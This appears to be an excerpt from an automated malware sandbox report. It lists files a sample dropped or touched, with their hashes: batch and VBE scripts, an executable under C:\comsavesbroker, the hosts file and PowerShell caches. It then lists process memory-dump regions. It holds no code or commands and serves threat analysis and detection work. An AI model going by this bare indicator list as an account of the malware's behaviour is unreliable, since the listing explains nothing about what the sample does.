3861a88635ee8e69b281d4250235aad08cc1f9ce4ebcaa712f333f28817df003bcac59eaab155866da4f8980ff26bdb932db7ffae5ce023c8349b28cb3bedc1b

Download Submit
C:\Users\Admin\AppData\Local\Temp\lJwS3LgKwS.bat
Filesize
227B

MD5
a3c3796bbbfaa888e605695ddfd85b6c

SHA1
26b1e5455c026ea4b5262efb3091c549b610fe6c

SHA256
e52dd2c5a9d89e05b270a2202ec4de9062a1795328f7ec6119bcb73ab4f264d0

SHA512
385a32496931f95da67c3a85a0546b69800730f06119956852f57b37acbe19184bc85170e7ee41b3e4d64845a359b00591ab6e057e95b7037bd4f118ef99bc42

Download Submit
C:\Windows\System32\config\systemprofile\AppData\Roaming\F603.tmp
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
4KB

MD5
bdb25c22d14ec917e30faf353826c5de

SHA1
6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

SHA256
e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

SHA512
b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
10KB

MD5
668f710d6dc199ad826793065ca34331

SHA1
7564cd5b087dc35d370a4198d9aada667d83fd3f

SHA256
58340c8faef1cfc48564c7ca36eaa93b237804c5bcdccd34f958cb7dbf5097f9

SHA512
b3310addd08f504de98104304b2ea29ffb9cf896f8b38af6d9a1a4ed4dd7343324d3585e373abe785bec817a8d696833936ae3c8fd1d6883332a59cebabb77b9

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
b42c70c1dbf0d1d477ec86902db9e986

SHA1
1d1c0a670748b3d10bee8272e5d67a4fabefd31f

SHA256
8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

SHA512
57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
2KB

MD5
9e97fb2695d962c6323739e02ad343b8

SHA1
f8678637e6e0b049990515fe5b86d7e1c899c64c

SHA256
aa28ac9b1e05ad85bc79a9a75157240ac15b9c16d6e66404b981a299cfcfa6e2

SHA512
373a98b305140a42e99e7f5c0862ef83dd1b2d2546b6d9e64dfa82bb0efc8609f4a36b8cb9e0f52be8b4e76ee4a23586a8042a67eb888285a8045dcbd1f0baaf

Download Submit
C:\comsavesbroker\4n37jNWytc0aB7dtWciFo5V7J2iV9.vbe
Filesize
216B

MD5
83c65c5fb5d6cae5d1a56338d81546d8

SHA1
da674eea76da502aeba2c0a63d551dc9d243c561

SHA256
c4010b41b3ee553d967decf86d7856464f9ae29bfd5334cd602f24cd14424783

SHA512
0d5b0b94d8ec8d53539044ab5805547c12cbe4ca87d0c74e5b768f1904794a820a3fd5e662dc16d0232c60efc1491c79731975f55b2da12139d70e4ef8d1f9b6

Download Submit
C:\comsavesbroker\9vifgPznNWM81sSYpbQjkuUh7.bat
Filesize
42B

MD5
44d17cedd450404d8c00269b1524e8b3

SHA1
a220bcaa6f9116982f01d96ed0cf8e8e71a731c5

SHA256
353034b198126f85e5c8cfbdd287d525cbd2abd3c827260cca2d1d54ab372d46

SHA512
e1dd54671bcd0d0b97b11fd74447ff07978efbafee4d35d68bdef94e35078e0f84f6c1be63f1e976d0729da9f21829afc22dd76aa5a84a31d7270b60d53b2c5d

Download Submit
C:\comsavesbroker\containersavesdhcp.exe
Filesize
2.7MB

MD5
7aeb0f8f5e5a81fb192d7e0b78b0fee1

SHA1
e1b687512e02de7a95923502f8a6e6e5de138db7

SHA256
1e51c848e270506770baa7d39df81403c3636ff621a78c2f2ca36f9a9844618b

SHA512
232b509fb86ec6b54977780a3c29222bad48880b031d67897b63abcb116b66580b3853e40674869c387105a211f91d30388bd07b938f14674e15b83cee2e61c0

Download Submit
C:\comsavesbroker\containersavesdhcp.exe
Filesize
2.7MB

MD5
7aeb0f8f5e5a81fb192d7e0b78b0fee1

SHA1
e1b687512e02de7a95923502f8a6e6e5de138db7

SHA256
1e51c848e270506770baa7d39df81403c3636ff621a78c2f2ca36f9a9844618b

SHA512
232b509fb86ec6b54977780a3c29222bad48880b031d67897b63abcb116b66580b3853e40674869c387105a211f91d30388bd07b938f14674e15b83cee2e61c0

Download Submit
memory/220-288-0x0000014A4D180000-0x0000014A4D19C000-memory.dmp

Filesize
112KB

Download
memory/220-275-0x0000014A4D130000-0x0000014A4D14C000-memory.dmp

Filesize
112KB

Download
memory/220-292-0x0000014A4E230000-0x0000014A4E236000-memory.dmp

Filesize
24KB

Download
memory/220-291-0x0000014A4D170000-0x0000014A4D178000-memory.dmp

Filesize
32KB

Download
memory/220-290-0x0000014A4E250000-0x0000014A4E26A000-memory.dmp

Filesize
104KB

Download
memory/220-282-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/220-294-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/220-205-0x0000000000000000-mapping.dmp

Download
memory/220-207-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/220-289-0x0000014A4D160000-0x0000014A4D16A000-memory.dmp

Filesize
40KB

Download
memory/220-293-0x0000014A4E240000-0x0000014A4E24A000-memory.dmp

Filesize
40KB

Download
memory/220-286-0x0000014A4D150000-0x0000014A4D15A000-memory.dmp

Filesize
40KB

Download
memory/228-133-0x0000000000000000-mapping.dmp

Download
memory/344-132-0x0000000000000000-mapping.dmp

Download
memory/476-179-0x0000000000000000-mapping.dmp

Download
memory/508-243-0x0000000000000000-mapping.dmp

Download
memory/532-221-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/532-251-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/532-208-0x0000000000000000-mapping.dmp

Download
memory/752-220-0x0000000000000000-mapping.dmp

Download
memory/752-235-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/752-271-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/1008-195-0x0000000000000000-mapping.dmp

Download
memory/1012-230-0x0000000000000000-mapping.dmp

Download
memory/1112-212-0x0000000000000000-mapping.dmp

Download
memory/1112-258-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/1112-226-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/1260-248-0x0000000000000000-mapping.dmp

Download
memory/1316-273-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/1316-219-0x0000000000000000-mapping.dmp

Download
memory/1316-240-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/1332-139-0x0000000000000000-mapping.dmp

Download
memory/1332-144-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/1332-149-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/1332-158-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/1420-193-0x0000000000000000-mapping.dmp

Download
memory/1504-160-0x0000000000000000-mapping.dmp

Download
memory/1504-163-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/1504-164-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/1508-177-0x0000000000000000-mapping.dmp

Download
memory/1512-242-0x0000000000000000-mapping.dmp

Download
memory/1684-237-0x0000000000000000-mapping.dmp

Download
memory/1684-191-0x0000000000000000-mapping.dmp

Download
memory/1856-189-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/1856-180-0x0000000000000000-mapping.dmp

Download
memory/1856-198-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/1904-188-0x0000000000000000-mapping.dmp

Download
memory/1964-194-0x0000000000000000-mapping.dmp

Download
memory/2076-165-0x0000000000000000-mapping.dmp

Download
memory/2220-150-0x0000000000000000-mapping.dmp

Download
memory/2312-215-0x0000000000000000-mapping.dmp

Download
memory/2312-231-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/2312-265-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/2348-241-0x0000000000000000-mapping.dmp

Download
memory/2384-178-0x0000000000000000-mapping.dmp

Download
memory/2732-249-0x0000000000000000-mapping.dmp

Download
memory/2792-287-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/2792-280-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/2792-279-0x0000000000FC0000-0x0000000001272000-memory.dmp

Filesize
2.7MB

Download
memory/2792-276-0x0000000000000000-mapping.dmp

Download
memory/2828-146-0x0000000000000000-mapping.dmp

Download
memory/2828-147-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/2828-148-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/2864-169-0x0000000000000000-mapping.dmp

Download
memory/2968-145-0x0000000000000000-mapping.dmp

Download
memory/2988-224-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/2988-210-0x0000000000000000-mapping.dmp

Download
memory/2988-257-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/3052-192-0x0000000000000000-mapping.dmp

Download
memory/3232-305-0x0000000001200000-0x0000000001220000-memory.dmp

Filesize
128KB

Download
memory/3268-245-0x0000000000000000-mapping.dmp

Download
memory/3372-184-0x0000000000000000-mapping.dmp

Download
memory/3460-246-0x0000000000000000-mapping.dmp

Download
memory/3556-200-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/3556-152-0x0000000000000000-mapping.dmp

Download
memory/3556-157-0x0000000000AC0000-0x0000000000F0A000-memory.dmp

Filesize
4.3MB

Download
memory/3556-159-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/3556-167-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/3564-218-0x0000000000000000-mapping.dmp

Download
memory/3564-274-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/3564-239-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/3728-185-0x0000000000000000-mapping.dmp

Download
memory/3736-233-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/3736-217-0x0000000000000000-mapping.dmp

Download
memory/3736-269-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/3768-229-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/3768-262-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/3768-213-0x0000000000000000-mapping.dmp

Download
memory/3772-182-0x0000000000000000-mapping.dmp

Download
memory/3844-201-0x0000000000000000-mapping.dmp

Download
memory/3852-173-0x0000000000CF0000-0x0000000000FA2000-memory.dmp

Filesize
2.7MB

Download
memory/3852-174-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/3852-175-0x0000000002F80000-0x0000000002FD0000-memory.dmp

Filesize
320KB

Download
memory/3852-202-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/3852-176-0x000000001D3E0000-0x000000001D908000-memory.dmp

Filesize
5.2MB

Download
memory/3852-227-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/3852-170-0x0000000000000000-mapping.dmp

Download
memory/3888-196-0x0000000000000000-mapping.dmp

Download
memory/3956-140-0x0000000000000000-mapping.dmp

Download
memory/3976-141-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/3976-136-0x0000022C445E0000-0x0000022C44602000-memory.dmp

Filesize
136KB

Download
memory/3976-137-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/3976-134-0x0000000000000000-mapping.dmp

Download
memory/4120-209-0x0000000000000000-mapping.dmp

Download
memory/4120-253-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/4120-222-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/4188-281-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/4188-206-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/4312-256-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/4312-211-0x0000000000000000-mapping.dmp

Download
memory/4312-225-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/4356-247-0x0000000000000000-mapping.dmp

Download
memory/4412-183-0x0000000000000000-mapping.dmp

Download
memory/4420-181-0x0000000000000000-mapping.dmp

Download
memory/4552-142-0x0000000000000000-mapping.dmp

Download
memory/4564-232-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/4564-267-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/4564-216-0x0000000000000000-mapping.dmp

Download
memory/4660-223-0x0000000000000000-mapping.dmp

Download
memory/4664-197-0x0000000000000000-mapping.dmp

Download
memory/4672-199-0x0000000000000000-mapping.dmp

Download
memory/4764-236-0x0000000000000000-mapping.dmp

Download
memory/4864-187-0x0000000000000000-mapping.dmp

Download
memory/4904-260-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/4904-238-0x00007FFBEA940000-0x00007FFBEB401000-memory.dmp

Filesize
10.8MB

Download
memory/4904-214-0x0000000000000000-mapping.dmp

Download
memory/5004-190-0x0000000000000000-mapping.dmp

Download
memory/5028-244-0x0000000000000000-mapping.dmp

Download
memory/5080-283-0x0000000000000000-mapping.dmp

Download